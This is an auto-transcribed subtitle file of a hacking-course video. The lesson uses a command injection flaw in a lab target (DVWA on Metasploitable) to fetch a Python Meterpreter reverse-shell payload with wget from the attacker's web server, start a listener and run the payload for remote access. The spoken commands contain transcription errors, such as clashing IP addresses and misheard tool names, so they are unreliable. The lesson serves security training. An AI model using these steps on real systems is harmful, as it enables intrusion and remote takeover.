1
00:00:00,270 --> 00:00:00,780
Okay.

2
00:00:00,780 --> 00:00:08,220
So we have covered command injection, but you can combine this vulnerability with other tools as well.

3
00:00:08,370 --> 00:00:15,060
For example, in the last video we managed to establish connection using net cat and command injection

4
00:00:15,060 --> 00:00:15,960
of ability.

5
00:00:15,960 --> 00:00:22,650
But we can improve this by injecting a different payload, such as a better shell or a reverse shell

6
00:00:22,650 --> 00:00:24,330
that we coded in Python.

7
00:00:24,930 --> 00:00:31,830
The process of doing that is the same, so I'll show you how to send a payload to the target and make

8
00:00:31,830 --> 00:00:34,020
it execute with command injection.

9
00:00:34,620 --> 00:00:36,240
Why would we want to do this?

10
00:00:36,270 --> 00:00:40,040
Well, we always want to have the best payload possible.

11
00:00:40,050 --> 00:00:46,440
So why would we use Net Cat when my interpreter gives us a lot more useful options to run on the target

12
00:00:46,440 --> 00:00:46,950
system?

13
00:00:47,630 --> 00:00:51,410
And to do all of that, here are the steps that we must perform.

14
00:00:51,620 --> 00:00:55,400
We must first create the payload appropriate for our target.

15
00:00:55,640 --> 00:01:02,180
Then we must download that payload to our target machine with the help of command injection vulnerability.

16
00:01:02,180 --> 00:01:08,990
And at last we must execute that payload also with the help of command injection vulnerability.

17
00:01:09,410 --> 00:01:11,540
So sounds pretty simple, right?

18
00:01:11,900 --> 00:01:15,110
Let's figure out what payload we should create first.

19
00:01:15,230 --> 00:01:19,760
So to create payload, we need to figure out what do we know about our target.

20
00:01:20,090 --> 00:01:24,690
Well, we know that Metasploit table is a Linux 32 bit machine.

21
00:01:24,710 --> 00:01:27,920
So we can create a Linux method payload.

22
00:01:28,100 --> 00:01:31,880
But for this case, I like python payload a lot better.

23
00:01:32,030 --> 00:01:34,320
So let's create a python method.

24
00:01:34,340 --> 00:01:35,390
Better shell.

25
00:01:36,270 --> 00:01:40,130
Great thing about Linux systems is it comes default with Python.

26
00:01:40,140 --> 00:01:46,350
So Python payload is something that we can execute on our target without them having to install any

27
00:01:46,350 --> 00:01:47,400
additional software.

28
00:01:47,940 --> 00:01:49,860
Let's create it real quick.

29
00:01:49,860 --> 00:01:57,180
So we'll navigate to my desktop directory and here I will type MSV one on dash p and that will specify

30
00:01:57,180 --> 00:02:03,330
that we want to create Python method printer slash reverse TCP.

31
00:02:04,220 --> 00:02:07,370
The WL host is going to be our IP address.

32
00:02:07,370 --> 00:02:10,250
So let's check it out real quick.

33
00:02:12,410 --> 00:02:15,110
It is 182.168.1.9.

34
00:02:15,110 --> 00:02:20,170
Copied and pasted right here for the port.

35
00:02:20,180 --> 00:02:30,530
We can use port 6000, for example, and we are going to output this to arrows into tester dot P and

36
00:02:30,530 --> 00:02:34,970
I just named the payload tester, but feel free to name it anything that you want.

37
00:02:35,300 --> 00:02:39,290
I will press enter here and this will create our python payload.

38
00:02:40,060 --> 00:02:42,610
Let me go right here over this.

39
00:02:42,610 --> 00:02:46,760
And while this is creating, make sure that your burps is started up.

40
00:02:46,780 --> 00:02:54,420
Also make sure that your intercept is turned off and start up your Firefox and your Metasploit table

41
00:02:54,520 --> 00:02:55,540
virtual machine.

42
00:02:56,950 --> 00:03:02,020
So once you do that here in just a few seconds, our payload should be done.

43
00:03:02,910 --> 00:03:04,100
And here it is.

44
00:03:04,110 --> 00:03:09,510
Now that we got the payload created, we must figure out how can we deliver it to the target system.

45
00:03:09,960 --> 00:03:16,110
Of course we will do that using the command injection, but even then, the target must be able to download

46
00:03:16,110 --> 00:03:17,940
our payload from somewhere.

47
00:03:17,940 --> 00:03:18,540
Right.

48
00:03:18,660 --> 00:03:24,180
For this, we're going to use Apache to web server and host our payload there.

49
00:03:24,750 --> 00:03:29,280
Apache comes with Linux already so we can make it run real quick.

50
00:03:29,310 --> 00:03:35,820
To do that we must first type sudo and then service apache to start.

51
00:03:36,120 --> 00:03:37,920
It will ask us for the password.

52
00:03:37,920 --> 00:03:42,210
We input the password and this will start our Apache two web server.

53
00:03:42,510 --> 00:03:43,530
What does this mean?

54
00:03:43,560 --> 00:03:50,220
Well, this means that any file that is hosted inside of slash, var, slash w w slash HTML directory

55
00:03:50,220 --> 00:03:55,680
in our clinics will be hosted on our web page to anyone that visits our IP address.

56
00:03:56,130 --> 00:03:59,700
Let's first of all, visit that directory.

57
00:03:59,790 --> 00:04:07,890
See if I go see the var w w w h html type ls here and we got shell the txt from some previous video

58
00:04:07,890 --> 00:04:09,960
which we can delete straight away.

59
00:04:11,040 --> 00:04:13,800
And this might require root privileges.

60
00:04:13,800 --> 00:04:20,890
So let us just enter root account sudo as u and let's delete the shell tk.

61
00:04:21,029 --> 00:04:26,340
And now our directory is empty so no files are being hosted on our web server.

62
00:04:26,550 --> 00:04:30,420
Let's copy our tester, which in my case is in my home directory.

63
00:04:30,420 --> 00:04:33,390
Mr. Hacker and desktop tester dot pie.

64
00:04:33,390 --> 00:04:38,250
And we want to copy it inside the bar w w w and h html.

65
00:04:39,740 --> 00:04:48,440
And now if we were to go to our clinics machine and visit the IP address of my clinics, which is 122.168.1.9,

66
00:04:49,040 --> 00:04:53,900
we are going to see this page that has this file available to download.

67
00:04:54,500 --> 00:04:55,190
Great.

68
00:04:55,340 --> 00:04:59,750
All we are left to do right now is to execute this file on target system.

69
00:05:00,260 --> 00:05:04,400
Let's go to our command injection page on our Metasploit table.

70
00:05:05,330 --> 00:05:09,880
And to do that, we visit the IP address of Metasploit double navigate to DWA.

71
00:05:09,920 --> 00:05:11,780
All of this we already know.

72
00:05:12,230 --> 00:05:16,850
Let us enter username and password and go to the command injection.

73
00:05:16,850 --> 00:05:21,740
But before we do that, change the security level to either low or medium.

74
00:05:22,840 --> 00:05:29,110
Once we do that inside of the command ejection, we can execute the commands as from the previous video.

75
00:05:29,230 --> 00:05:38,650
So if I type right here, 1 to 2.1 6 to 8 .1.1 and dot and comma, and then else after it it will ping

76
00:05:38,650 --> 00:05:43,440
the Router's IP address and it will also print out the contents of that directory.

77
00:05:43,450 --> 00:05:45,490
But we don't want to ping every time.

78
00:05:45,490 --> 00:05:50,350
We can just type dot and comma which will specify that we want to enter an X Command and we can just

79
00:05:50,350 --> 00:05:51,700
type LZ after it.

80
00:05:51,700 --> 00:05:57,130
And this will just give us an output of the LZ command and we won't have to wait for the ping command

81
00:05:57,130 --> 00:05:57,850
to finish.

82
00:05:58,420 --> 00:06:05,170
Now let's download our payload using w get command and w get is something that you can run from a terminal

83
00:06:05,170 --> 00:06:10,120
in order to download a specific file from the page or link that you specify.

84
00:06:10,420 --> 00:06:13,210
Let me show you inside of terminal first.

85
00:06:13,210 --> 00:06:20,920
So right now I'm inside of the slash home slash Mr. Hacker directory and I don't have the dot p right

86
00:06:20,920 --> 00:06:28,930
here, but if I run the command w get and then 182.168.1.9, which is the IP address of kalanick's slash

87
00:06:28,930 --> 00:06:30,580
and then tester dot pie.

88
00:06:31,000 --> 00:06:38,590
With this link, we are accessing this page right here and this file right here which will tell our

89
00:06:38,590 --> 00:06:41,280
terminal that we want to download that file.

90
00:06:41,290 --> 00:06:46,810
If I press enter, it will download tests to that pie and if I type ls once again.

91
00:06:46,840 --> 00:06:51,610
Now we have tested that pie inside of our home and Mr. Hacker directory.

92
00:06:52,260 --> 00:06:56,400
We want to do the same thing on our target machine.

93
00:06:56,670 --> 00:07:01,650
So to do that, we can use dot and comma to specify the next command and type the same command.

94
00:07:01,650 --> 00:07:08,710
W get 182.168.1.9 slash tester dot p.

95
00:07:09,600 --> 00:07:11,060
I press submit.

96
00:07:11,520 --> 00:07:18,780
And if I run the LZ command once again, now we have one additional file, which is our payload.

97
00:07:19,690 --> 00:07:21,400
So it is there.

98
00:07:21,400 --> 00:07:24,970
It is on the target machine right now with the help of command injection.

99
00:07:25,810 --> 00:07:30,570
The last step we have to do is to set up a listener inside of MSV console.

100
00:07:30,580 --> 00:07:32,530
So let's do that real quick.

101
00:07:33,700 --> 00:07:37,630
And after we set up a listener, we must execute our payload.

102
00:07:38,430 --> 00:07:42,720
And here is the massive console we are already familiar with setting up of the listener.

103
00:07:42,720 --> 00:07:51,060
We are going to use exploit multi handler and we need to set the payload to be a python slash interpreter

104
00:07:52,290 --> 00:07:56,160
slash reverse underscore TCP.

105
00:07:56,640 --> 00:08:02,700
If I show options, all we want to do is set the LL host and output and that will be the IP address

106
00:08:02,700 --> 00:08:06,780
of Linux and the port will be 6000.

107
00:08:06,780 --> 00:08:09,740
The same options that we specified inside the web.

108
00:08:09,750 --> 00:08:10,710
S.F. Why not?

109
00:08:11,310 --> 00:08:17,670
Then I will run this and all we are left to do right now is to execute this test p with the help of

110
00:08:17,670 --> 00:08:18,570
command injection.

111
00:08:18,570 --> 00:08:20,070
So let's see how we can do that.

112
00:08:20,490 --> 00:08:27,540
If I type dot and comma and python tester dot pie press enter.

113
00:08:28,420 --> 00:08:30,190
This page will load.

114
00:08:30,190 --> 00:08:36,010
And these are good news because that would most likely mean that we got the Metro Shell opened with

115
00:08:36,010 --> 00:08:37,049
the help of Python.

116
00:08:37,059 --> 00:08:44,440
We executed our Python program on the target machine and it opened our method shell where we can execute

117
00:08:44,440 --> 00:08:46,300
various commands as usual.

118
00:08:46,300 --> 00:08:52,900
We can run help command to see what else we can execute, and we can basically perform post exploitation

119
00:08:52,900 --> 00:08:54,280
that we already covered.

120
00:08:54,700 --> 00:08:55,270
Great.

121
00:08:55,270 --> 00:09:00,910
So this is just another way that you can use command injection to your advantage to spawn a better payload

122
00:09:00,910 --> 00:09:04,090
than just a simple net command execution.

123
00:09:04,390 --> 00:09:08,170
So you can try to test this with our python payload if you want.

124
00:09:08,950 --> 00:09:09,490
Great.

125
00:09:09,520 --> 00:09:15,220
Now that we cover the command injection vulnerability in the next video, we're going to go into cross-site

126
00:09:15,220 --> 00:09:17,020
scripting vulnerability.

127
00:09:17,380 --> 00:09:18,160
See you there.